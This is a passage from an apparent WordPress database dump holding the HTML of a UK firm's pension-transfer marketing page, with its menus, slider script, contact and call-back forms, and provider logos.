Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/><script type=\"text/javascript\" src=\"/scripts.hellobar.com/565e6e29d8b6bfca77549154aee8b14f23536824.js\"/></body>','&#13;\n	Pension Review','Pension Review, we can make your life simpler with an expert pension review so you know what your best choices are and how to make them. Find out how...','publish','closed','closed','','pension-review','','','2017-09-21 16:34:36','2017-09-21 16:34:36','',0,'http://www.equalitywalk.org.uk/pension-review',0,'page','',0),(93,1,'2017-09-21 16:34:37','2017-09-21 16:34:37','<body class=\"page page-id-707 page-child parent-pageid-25 page-template page-template-100-width-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor current-menu-ancestor current-menu-parent current-page-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-27\"><a href=\"/pensions\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-707 current_page_item menu-item-741\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pension-review\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"/investments\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"/trusts\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									&#13;\n				<!-- START REVOLUTION SLIDER 3.0.95 fullwidth mode -->&#13;\n				&#13;\n								&#13;\n								<div id=\"rev_slider_35_1_wrapper\" class=\"rev_slider_wrapper fullwidthbanner-container\" style=\"margin:0px auto;background-color:#E9E9E9;padding:0px;margin-top:0px;margin-bottom:0px;max-height:350px;\">&#13;\n					<div id=\"rev_slider_35_1\" class=\"rev_slider fullwidthabanner\" style=\"display:none;max-height:350px;height:350;\">						&#13;\n										<ul><li data-transition=\"fade\" data-slotamount=\"7\">&#13;\n						&#13;\n														<div class=\"tp-caption large_text lft\" data-x=\"33\" data-y=\"44\" data-speed=\"500\" data-start=\"0\" data-easing=\"easeOutBack\">Looking For Expert <br/>Pension Transfer Advice?					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption modern_small_text_dark sfl\" data-x=\"36\" data-y=\"216\" data-speed=\"500\" data-start=\"0\" data-easing=\"easeOutBack\">Learn more below about our pension transfer service 					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption modern_small_text_dark sft\" data-x=\"35\" data-y=\"132\" data-speed=\"500\" data-start=\"0\" data-easing=\"easeOutExpo\">We help turnaround poor performing pensions by providing<br/> you with the best pension deals from the whole market, with<br/> no complex charges, and the best returns. 					 					 </div>&#13;\n				&#13;\n									</li>&#13;\n								</ul></div>&#13;\n				</div>				&#13;\n							&#13;\n			<script type=\"text/javascript\"><![CDATA[\r\n\r\n				var tpj=jQuery;\r\n				\r\n									tpj.noConflict();\r\n								\r\n				var revapi35;\r\n				\r\n				tpj(document).ready(function() {\r\n				\r\n				if (tpj.fn.cssOriginal != undefined)\r\n					tpj.fn.css = tpj.fn.cssOriginal;\r\n				\r\n				if(tpj(\'#rev_slider_35_1\').revolution == undefined)\r\n					revslider_showDoubleJqueryError(\'#rev_slider_35_1\');\r\n				else\r\n				   revapi35 = tpj(\'#rev_slider_35_1\').show().revolution(\r\n					{\r\n						delay:9000,\r\n						startwidth:1000,\r\n						startheight:350,\r\n						hideThumbs:200,\r\n						\r\n						thumbWidth:100,\r\n						thumbHeight:50,\r\n						thumbAmount:1,\r\n						\r\n						navigationType:\"bullet\",\r\n						navigationArrows:\"solo\",\r\n						navigationStyle:\"round\",\r\n						\r\n						touchenabled:\"on\",\r\n						onHoverStop:\"on\",\r\n						\r\n						navigationHAlign:\"center\",\r\n						navigationVAlign:\"bottom\",\r\n						navigationHOffset:0,\r\n						navigationVOffset:20,\r\n\r\n						soloArrowLeftHalign:\"left\",\r\n						soloArrowLeftValign:\"center\",\r\n						soloArrowLeftHOffset:20,\r\n						soloArrowLeftVOffset:0,\r\n\r\n						soloArrowRightHalign:\"right\",\r\n						soloArrowRightValign:\"center\",\r\n						soloArrowRightHOffset:20,\r\n						soloArrowRightVOffset:0,\r\n								\r\n						shadow:0,\r\n						fullWidth:\"on\",\r\n						fullScreen:\"off\",\r\n\r\n						stopLoop:\"off\",\r\n						stopAfterLoops:-1,\r\n						stopAtSlide:-1,\r\n\r\n						shuffle:\"off\",\r\n						\r\n						hideSliderAtLimit:0,\r\n						hideCaptionAtLimit:0,\r\n						hideAllCaptionAtLilmit:0,\r\n						startWithSlide:0,\r\n						videoJsPath:\"http://www.equalitywalk.org.uk/wp-content/plugins/revslider/rs-plugin/videojs/\",\r\n						fullScreenOffsetContainer: \"\"	\r\n					});\r\n				\r\n				});	//ready\r\n				\r\n			]]></script><!-- END REVOLUTION SLIDER --></div>&#13;\n																<div id=\"main\" class=\"width-100\" style=\"overflow:hidden !important;padding-left:0px;padding-right:0px;\">&#13;\n		<div class=\"avada-row\" style=\"max-width:100%;\">&#13;\n				<div id=\"content\" class=\"full-width\">&#13;\n				<div id=\"post-707\" class=\"post-707 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Pension Transfer</span>&#13;\n			<span class=\"updated\" style=\"display: none;\"/>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/paul\" title=\"Posts by Becky Barnet\" rel=\"author\"/></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"fullwidth-box\" style=\"background-color:;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:0px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"><div class=\"one_half\">&#13;\n<h1>Pension Transfer</h1>&#13;\n<div id=\"lp-pom-text-122\">&#13;\n<p>A pension transfer is the process of moving a pension from one fund to another. There are a variety of reasons as to why you may wish to transfer your pension. The obvious ones are to improve performance and reduce charges.</p>&#13;\n<p>We’ve been providing expert pension advice to UK consumers for over 20 years on how pension transfers work, what the main rules are and what you need to think about if you’re considering transferring  from one pension to another.</p>&#13;\n<p>Our aim  is not to sell you a pension, but provide you with great pension transfer planning – which in some cases might lead to setting up a new pension, and sometimes not.</p>&#13;\n<p>What is important is that whatever arrangements you have, are a good fit for your circumstances.</p>&#13;\n<p>Transferring a pension is a unique process tailored to the needs of each individual client. However, it’s worth knowing that a pension transfer will not work for everyone..</p>&#13;\n</div>&#13;\n<p><b>Which is exactly why you need a pension transfer specialist – and precisely why we’re here to help.</b></p>&#13;\n<h2 style=\"text-align: center;\">Ready To Improve Your Pension?</h2>&#13;\n<h5 style=\"text-align: center;\"><big><big>Call FREE on  or fill out the form to the right to get a FREE pension transfer consultation</big></big></h5>&#13;\n<p/></div><div class=\"one_half last\">&#13;\n<style type=\"text/css\"><![CDATA[\r\n	#tabs-1,#tabs-1.tabs-vertical .tabs,#tabs-1.tabs-vertical .tab_content{border-color:#ebeaea !important;}\r\n	#main #tabs-1.tabs-horizontal,#tabs-1.tabs-vertical .tab_content,.pyre_tabs .tabs-container{background-color:#f7f7f7 !important;}\r\n	body #tabs-1.shortcode-tabs .tab-hold .tabs li,body.dark #sidebar .tab-hold .tabs li{border-right:1px solid #f7f7f7 !important;}\r\n	body #tabs-1.shortcode-tabs .tab-hold .tabs li:last-child{border-right-width:0 !important;}\r\n	body #tabs-1.shortcode-tabs .tab-hold .tabs li.no-border-right{border-right-width:0 !important;}\r\n	body #main #tabs-1 .tab-hold .tabs li a{background:#ebeaea !important;border-bottom:0 !important;color:#303030 !important;}\r\n	body #main #tabs-1 .tab-hold .tabs li a:hover{background:#f7f7f7 !important;border-bottom:0 !important;}\r\n	body #main #tabs-1 .tab-hold .tabs li.active a,body #main #tabs-1 .tab-hold .tabs li.active{background:#f7f7f7 !important;border-bottom:0 !important;}\r\n	#sidebar .tab-hold .tabs li.active a{border-top-color:#afd9a5 !important;}\r\n	]]></style><div id=\"tabs-1\" class=\"tab-holder shortcode-tabs clearfix tabs-horizontal\"><div class=\"tab-hold tabs-wrapper\"><ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tabsend_us_a_message\">Send Us A Message</a></li><li><a href=\"#tabget_a_call_back\">Get A Call Back</a></li></ul><div class=\"tab-box tabs-container\"><div id=\"tabsend_us_a_message\" class=\"tab tab_content\">If you have any questions about transferring a pension or pension planning get in touch by filling out the form below:&#13;\n                <div class=\"gf_browser_unknown gform_wrapper\" id=\"gform_wrapper_6\"><a id=\"gf_6\" name=\"gf_6\" class=\"gform_anchor\"/><form method=\"post\" enctype=\"multipart/form-data\" target=\"gform_ajax_frame_6\" id=\"gform_6\" action=\"../../pensions/pension-transfer/\">&#13;\n                        <div class=\"gform_body\">&#13;\n                            <ul id=\"gform_fields_6\" class=\"gform_fields top_label description_above\"><li id=\"field_6_1\" class=\"gfield               gfield_contains_required\"><label class=\"gfield_label\" for=\"input_6_1\">Name<span class=\"gfield_required\">*</span></label><div class=\"ginput_container\"><input name=\"input_1\" id=\"input_6_1\" type=\"text\" value=\"\" class=\"medium\" tabindex=\"1\"/></div></li><li id=\"field_6_11\" class=\"gfield\"><label class=\"gfield_label\" for=\"input_6_11\">Email Address</label><div class=\"ginput_container\"><input name=\"input_11\" id=\"input_6_11\" type=\"text\" value=\"\" class=\"medium\" tabindex=\"2\"/></div></li><li id=\"field_6_8\" class=\"gfield               gfield_contains_required\"><label class=\"gfield_label\" for=\"input_6_8\">What Would You Like To Discuss<span class=\"gfield_required\">*</span></label><div class=\"ginput_container\"><select name=\"input_8\" id=\"input_6_8\" class=\"medium gfield_select\" tabindex=\"3\"><option value=\"Please select\">Please select</option><option value=\"Pensions\">Pensions</option><option value=\"Insurance\">Insurance</option><option value=\"Trusts\">Trusts</option><option value=\"Investments\">Investments</option><option value=\"Wealth\">Wealth</option><option value=\"Other\">Other</option></select></div></li><li id=\"field_6_5\" class=\"gfield\"><label class=\"gfield_label\" for=\"input_6_5\">Your Message</label><div class=\"ginput_container\"><textarea name=\"input_5\" id=\"input_6_5\" class=\"textarea small\" tabindex=\"4\" rows=\"10\" cols=\"50\"/></div></li><li id=\"field_6_12\" class=\"gfield    gform_validation_container\"><label class=\"gfield_label\" for=\"input_6_12\">Comments</label><div class=\"ginput_container\"><input name=\"input_12\" id=\"input_6_12\" type=\"text\" value=\"\" autocomplete=\"off\"/></div><div class=\"gfield_description\">This field is for validation purposes and should be left unchanged.</div></li>&#13;\n                            </ul></div>&#13;\n        <div class=\"gform_footer top_label\"> <input type=\"submit\" id=\"gform_submit_button_6\" class=\"button gform_button\" value=\"Send Your Message\" tabindex=\"5\" onclick=\"if(window[&quot;gf_submitting_6&quot;]){return false;}  if( !jQuery(&quot;#gform_6&quot;)[0].checkValidity || jQuery(&quot;#gform_6&quot;)[0].checkValidity()){window[&quot;gf_submitting_6&quot;]=true;} \"/><input type=\"hidden\" name=\"gform_ajax\" value=\"form_id=6&amp;title=&amp;description=&amp;tabindex=1\"/><input type=\"hidden\" class=\"gform_hidden\" name=\"is_submit_6\" value=\"1\"/><input type=\"hidden\" class=\"gform_hidden\" name=\"gform_submit\" value=\"6\"/><input type=\"hidden\" class=\"gform_hidden\" name=\"gform_unique_id\" value=\"\"/><input type=\"hidden\" class=\"gform_hidden\" name=\"state_6\" value=\"WyJhOjA6e30iLCJhZDYyNDUxOWU4MmU2Y2ZlZTVlMjc2MmJlYTE3NDA2NSJd\"/><input type=\"hidden\" class=\"gform_hidden\" name=\"gform_target_page_number_6\" id=\"gform_target_page_number_6\" value=\"0\"/><input type=\"hidden\" class=\"gform_hidden\" name=\"gform_source_page_number_6\" id=\"gform_source_page_number_6\" value=\"1\"/><input type=\"hidden\" name=\"gform_field_values\" value=\"\"/></div>&#13;\n                        &#13;\n                        </form></div>&#13;\n                <iframe style=\"display:none;width:0px;height:0px;\" src=\"/\" name=\"gform_ajax_frame_6\" id=\"gform_ajax_frame_6\"/>&#13;\n                <script type=\"text/javascript\"><![CDATA[jQuery(document).ready(function($){gformInitSpinner( 6, \'http://www.equalitywalk.org.uk/wp-content/plugins/gravityforms/images/spinner.gif\' );jQuery(\'#gform_ajax_frame_6\').load( function(){var contents = jQuery(this).contents().find(\'*\')();var is_postback = contents.indexOf(\'GF_AJAX_POSTBACK\') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find(\'#gform_wrapper_6\');var is_redirect = contents.indexOf(\'gformRedirect(){\') >= 0;var is_form = !(form_content.length <= 0 || is_redirect);if(is_form){jQuery(\'#gform_wrapper_6\')(form_content());jQuery(document).scrollTop(jQuery(\'#gform_wrapper_6\').offset().top);if(window[\'gformInitDatepicker\']) {gformInitDatepicker();}if(window[\'gformInitPriceFields\']) {gformInitPriceFields();}var current_page = jQuery(\'#gform_source_page_number_6\').val();gformInitSpinner( 6, \'http://www.equalitywalk.org.uk/wp-content/plugins/gravityforms/images/spinner.gif\' );jQuery(document).trigger(\'gform_page_loaded\', [6, current_page]);window[\'gf_submitting_6\'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find(\'#gforms_confirmation_message\')();if(!confirmation_content){confirmation_content = contents;}setTimeout(function(){jQuery(\'#gform_wrapper_6\').replaceWith(\'<\' + \'div id=\'gforms_confirmation_message\' class=\'gform_confirmation_message_6\'\' + \'>\' + confirmation_content + \'<\' + \'/div\' + \'>\');jQuery(document).scrollTop(jQuery(\'#gforms_confirmation_message\').offset().top);jQuery(document).trigger(\'gform_confirmation_loaded\', [6]);window[\'gf_submitting_6\'] = false;}, 50);}else{jQuery(\'#gform_6\').append(contents);if(window[\'gformRedirect\']) {gformRedirect();}}jQuery(document).trigger(\'gform_post_render\', [6, current_page]);} );} );]]></script><script type=\"text/javascript\"><![CDATA[ jQuery(document).ready(function(){jQuery(document).trigger(\'gform_post_render\', [6, 1]) } ); ]]></script></div><div id=\"tabget_a_call_back\" class=\"tab tab_content\">If you have any questions about transferring a pension or pension planning get in touch by filling out the form below:&#13;\n                <div class=\"gf_browser_unknown gform_wrapper\" id=\"gform_wrapper_3\"><a id=\"gf_3\" name=\"gf_3\" class=\"gform_anchor\"/><form method=\"post\" enctype=\"multipart/form-data\" target=\"gform_ajax_frame_3\" id=\"gform_3\" action=\"../../pensions/pension-transfer/\">&#13;\n                        <div class=\"gform_body\">&#13;\n                            <ul id=\"gform_fields_3\" class=\"gform_fields top_label description_above\"><li id=\"field_3_1\" class=\"gfield               gfield_contains_required\"><label class=\"gfield_label\" for=\"input_3_1\">Name<span class=\"gfield_required\">*</span></label><div class=\"ginput_container\"><input name=\"input_1\" id=\"input_3_1\" type=\"text\" value=\"\" class=\"medium\" tabindex=\"1\"/></div></li><li id=\"field_3_10\" class=\"gfield               gfield_contains_required\"><label class=\"gfield_label\" for=\"input_3_10\">Phone Number<span class=\"gfield_required\">*</span></label><div class=\"ginput_container\"><input name=\"input_10\" id=\"input_3_10\" type=\"text\" value=\"\" class=\"medium\" tabindex=\"2\"/></div></li><li id=\"field_3_8\" class=\"gfield               gfield_contains_required\"><label class=\"gfield_label\" for=\"input_3_8\">What Would You Like To Discuss<span class=\"gfield_required\">*</span></label><div class=\"ginput_container\"><select name=\"input_8\" id=\"input_3_8\" class=\"medium gfield_select\" tabindex=\"3\"><option value=\"Please select\">Please select</option><option value=\"Pensions\">Pensions</option><option value=\"Insurance\">Insurance</option><option value=\"Trusts\">Trusts</option><option value=\"Investments\">Investments</option><option value=\"Wealth\">Wealth</option><option value=\"Other\">Other</option></select></div></li><li id=\"field_3_11\" class=\"gfield\"><label class=\"gfield_label\" for=\"input_3_11\">What Time Would You Like A Call Back?</label><div class=\"clear-multi\"><div class=\"gfield_time_hour ginput_container\" id=\"input_3_11\"><input type=\"text\" maxlength=\"2\" name=\"input_11[]\" id=\"input_3_11_1\" value=\"\" tabindex=\"4\"/> : <label for=\"input_3_11_1\">HH</label></div><div class=\"gfield_time_minute ginput_container\"><input type=\"text\" maxlength=\"2\" name=\"input_11[]\" id=\"input_3_11_2\" value=\"\" tabindex=\"5\"/><label for=\"input_3_11_2\">MM</label></div><div class=\"gfield_time_ampm ginput_container\"><select name=\"input_11[]\" id=\"input_3_11_3\" tabindex=\"6\"><option value=\"am\">AM</option><option value=\"pm\">PM</option></select></div></div></li><li id=\"field_3_12\" class=\"gfield    gform_validation_container\"><label class=\"gfield_label\" for=\"input_3_12\">Name</label><div class=\"ginput_container\"><input name=\"input_12\" id=\"input_3_12\" type=\"text\" value=\"\" autocomplete=\"off\"/></div><div class=\"gfield_description\">This field is for validation purposes and should be left unchanged.</div></li>&#13;\n                            </ul></div>&#13;\n        <div class=\"gform_footer top_label\"> <input type=\"submit\" id=\"gform_submit_button_3\" class=\"button gform_button\" value=\"Get A Call Back\" tabindex=\"7\" onclick=\"if(window[&quot;gf_submitting_3&quot;]){return false;}  if( !jQuery(&quot;#gform_3&quot;)[0].checkValidity || jQuery(&quot;#gform_3&quot;)[0].checkValidity()){window[&quot;gf_submitting_3&quot;]=true;} \"/><input type=\"hidden\" name=\"gform_ajax\" value=\"form_id=3&amp;title=&amp;description=&amp;tabindex=1\"/><input type=\"hidden\" class=\"gform_hidden\" name=\"is_submit_3\" value=\"1\"/><input type=\"hidden\" class=\"gform_hidden\" name=\"gform_submit\" value=\"3\"/><input type=\"hidden\" class=\"gform_hidden\" name=\"gform_unique_id\" value=\"\"/><input type=\"hidden\" class=\"gform_hidden\" name=\"state_3\" value=\"WyJhOjA6e30iLCJhZDYyNDUxOWU4MmU2Y2ZlZTVlMjc2MmJlYTE3NDA2NSJd\"/><input type=\"hidden\" class=\"gform_hidden\" name=\"gform_target_page_number_3\" id=\"gform_target_page_number_3\" value=\"0\"/><input type=\"hidden\" class=\"gform_hidden\" name=\"gform_source_page_number_3\" id=\"gform_source_page_number_3\" value=\"1\"/><input type=\"hidden\" name=\"gform_field_values\" value=\"\"/></div>&#13;\n                        &#13;\n                        </form></div>&#13;\n                <iframe style=\"display:none;width:0px;height:0px;\" src=\"/\" name=\"gform_ajax_frame_3\" id=\"gform_ajax_frame_3\"/>&#13;\n                <script type=\"text/javascript\"><![CDATA[jQuery(document).ready(function($){gformInitSpinner( 3, \'http://www.equalitywalk.org.uk/wp-content/plugins/gravityforms/images/spinner.gif\' );jQuery(\'#gform_ajax_frame_3\').load( function(){var contents = jQuery(this).contents().find(\'*\')();var is_postback = contents.indexOf(\'GF_AJAX_POSTBACK\') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find(\'#gform_wrapper_3\');var is_redirect = contents.indexOf(\'gformRedirect(){\') >= 0;var is_form = !(form_content.length <= 0 || is_redirect);if(is_form){jQuery(\'#gform_wrapper_3\')(form_content());jQuery(document).scrollTop(jQuery(\'#gform_wrapper_3\').offset().top);if(window[\'gformInitDatepicker\']) {gformInitDatepicker();}if(window[\'gformInitPriceFields\']) {gformInitPriceFields();}var current_page = jQuery(\'#gform_source_page_number_3\').val();gformInitSpinner( 3, \'http://www.equalitywalk.org.uk/wp-content/plugins/gravityforms/images/spinner.gif\' );jQuery(document).trigger(\'gform_page_loaded\', [3, current_page]);window[\'gf_submitting_3\'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find(\'#gforms_confirmation_message\')();if(!confirmation_content){confirmation_content = contents;}setTimeout(function(){jQuery(\'#gform_wrapper_3\').replaceWith(\'<\' + \'div id=\'gforms_confirmation_message\' class=\'gform_confirmation_message_3\'\' + \'>\' + confirmation_content + \'<\' + \'/div\' + \'>\');jQuery(document).scrollTop(jQuery(\'#gforms_confirmation_message\').offset().top);jQuery(document).trigger(\'gform_confirmation_loaded\', [3]);window[\'gf_submitting_3\'] = false;}, 50);}else{jQuery(\'#gform_3\').append(contents);if(window[\'gformRedirect\']) {gformRedirect();}}jQuery(document).trigger(\'gform_post_render\', [3, current_page]);} );} );]]></script><script type=\"text/javascript\"><![CDATA[ jQuery(document).ready(function(){jQuery(document).trigger(\'gform_post_render\', [3, 1]) } ); ]]></script></div></div></div></div>&#13;\n</div><div class=\"clearboth\"/>&#13;\n<style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:#f6f6f6 !important;border-width:1px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><h2>Is Your Future Financially Secure?</h2><p/>&#13;\n<ul><li>Are you worried about your level of income in retirement?</li>&#13;\n<li>Do you think it\'s important to get the best pension transfer value and make every penny count?</li>&#13;\n<li>Would you like help from a pension transfer specialist to research the whole of the market, ensuring you have the best pensions strategy?</li>&#13;\n</ul><p>If you have answered YES to any of these questions you will want to know if your pension can be improved upon. Our Pension Transfer Review can help you if you are contributing to or have a frozen pension in:</p>&#13;\n<ol><li>A Personal Pension or Works Pension</li>&#13;\n<li>A Self Invested Personal Pension (SIPP) </li>&#13;\n<li>Final Salary pension / A Group Personal Pension</li>&#13;\n<li>An Executive Pension</li>&#13;\n</ol><p>Get Clear, Specific Straight forward Pension Advice.</p></section></div>&#13;\n<div class=\"one_half\"><div class=\"demo-sep sep-none\" style=\"margin-top:25px;\"/>&#13;\n<p/>&#13;\n<p/></div><div class=\"one_half last\">&#13;\n<p>Get Your FREE Review from the Pension Transfer Specialists</p>&#13;\n<p>Our pension review will help you:</p>&#13;\n<style type=\"text/css\"><![CDATA[\r\n	.post-content #checklist-1 li:before{color:#ffffff !important; content:\'f046\' }\r\n	.rtl .post-content #checklist-1 li:after{color:#ffffff !important; content:\'f046\' }\r\n	]]></style><ul id=\"checklist-1\" class=\"list-icon circle-yes list-icon-check\"><li>discover if you’re paying too much in fees (<b>and how to change that</b>)</li>&#13;\n<li>see if you have a poor performing pension (<b>and how to get it back on track</b>)</li>&#13;\n<li>find missing pensions (<b>and get them firing on all cylinders for you</b>)</li>&#13;\n<li>regain more control over your pension (<b>to grow and nurture your pension pot</b>)</li>&#13;\n<li>help you get your retirement plans back on track (<b>no matter how old you are!</b>)</li>&#13;\n</ul><p>&#13;\n</p><p>What you will get in your FREE Pension Analysis Report:</p>&#13;\n<p>We provide a detailed computerised transfer value analysis calculation. This will give you a clear and transparent comparison of your current or frozen pension you are considering for transfer with alternatives. We will look at the critical yields required for your pension to grow at, andy scheme benefits and charges to determine if a transfer is worth considering.</p>&#13;\n<div class=\"demo-sep sep-none\" style=\"margin-top:18px;\"/><a class=\"button large green\" href=\"/contact-us\" target=\"_blank\">Request Your FREE Review</a></div><div class=\"clearboth\"/>&#13;\n<div class=\"demo-sep sep-none\" style=\"margin-top:25px;\"/><div class=\"title\"><h2>We Compare All The Leading Pension Providers. Here are a Few You Might Recognise:</h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n<div class=\"images-carousel-container related-posts related-projects \"><div id=\"carousel\" class=\"clients-carousel es-carousel-wrapper\"><div class=\"es-carousel\"><ul><li><a href=\"\" target=\"\"><img src=\"/wp-content/uploads/2013/05/axa.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"/wp-content/uploads/2013/05/aegon.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"/wp-content/uploads/2013/05/aviva.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"/wp-content/uploads/2013/05/friendslife.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"/wp-content/uploads/2013/05/Standard_Life_logo1.png\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"/wp-content/uploads/2013/05/legal-and-general.gif\" alt=\"\"/></a></li><li><a 